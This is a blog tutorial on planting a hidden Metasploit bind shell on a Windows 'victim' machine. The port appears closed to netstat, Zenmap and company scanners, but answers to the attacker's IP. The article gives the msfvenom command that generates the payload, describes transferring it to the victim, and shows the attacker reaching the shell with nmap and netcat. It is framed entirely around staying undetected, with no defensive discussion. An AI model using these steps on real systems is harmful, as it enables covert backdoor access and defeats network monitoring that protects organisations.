fbpx

How to Hide Shellcode Behind Closed Port?

Every company has a variety of scanners for analyzing its network and identifying new or unknown open ports. It’s unthinkable to disguise the potentially malicious bind shellcode within that kind of setting and stay undetected by their scanners.

In this article, we will look at how one can hide Shellcode behind a closed port.

Hidden Bind TCP shell listens for connections from the host’s IP address (Ahost) and responds with an RST packet to other connections. It makes the port appear closed, allowing us to disguise the Shellcode.

Let’s dig it further!

With msfvenom, generate a payload for victim PC (Windows machine) utilizing shell_hidden _bind_tcp and output a file with .exe format.

msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker’s IP] lport=4321 -f exe > file.exe

How to Hide Shellcode Behind Closed Port

Transfer the payload to the victim machine (here, I am using “cifs utils” to transmit the malicious payload.)

When the victim runs the file, it will start a new service with port number 4321 connected to the attacker’s IP.

For instance, if the victim executes the “netstat command” to check the active connections, then port 4321 somehow won’t have an IP address; that looks that specific local services are operating on local connections.

How to Hide Shellcode Behind Closed Port

And by chance, if the victim scans the ports through any scanner like Zenmap, then the malicious port will appear close on that tool as well.

How to Hide Shellcode Behind Closed Port2

 

When the attacker scans the target IP, the port will appear as open.

nmap -p [Port-num] [Target IP]

How to Hide Shellcode Behind Closed Port 3.png

An attacker can have a session on the victim machine using netcat as well.

How to Hide Shellcode Behind Closed Port 4

Conclusion

In this tutorial, we saw the sorcery of hiding a TCP Bind Shellcode behind a closed port. Using “msfvenom,” we created a payload, transferred it to the victim machine using “cifs utils,” and bang, we succeeded with an open port and a session of the victim machine using “netcat.”

Sana Qazi
Sana Qazi is a technical writer specialized in Information Security. She enjoys writing about technology and reading multiple genres like suspense. When not writing, she can be found traveling, dinning out, watching series etc. She manages her medium blog as well.

Most Popular

What are Online Casinos doing to be as Safe and Secure as Possible?

Online casinos have continued to increase in popularity over recent years as more and more gamblers have turned to virtual options to further enhance...

Reconnaissance for Bug Bounty Hunters & Pentesters

New to the bug bounty and confused about where to start? Worry not! This reconnaissance for bug bounty hunters guides you to take the...

Access & Manage Android Phone Remotely – L3MON Tutorial

There is software available, like Metasploit, to gain remote access to any android phone. But other than that, we have the L3MON tool (A...

How to Hide Shellcode Behind Closed Port?

Every company has a variety of scanners for analyzing its network and identifying new or unknown open ports. It's unthinkable to disguise the potentially...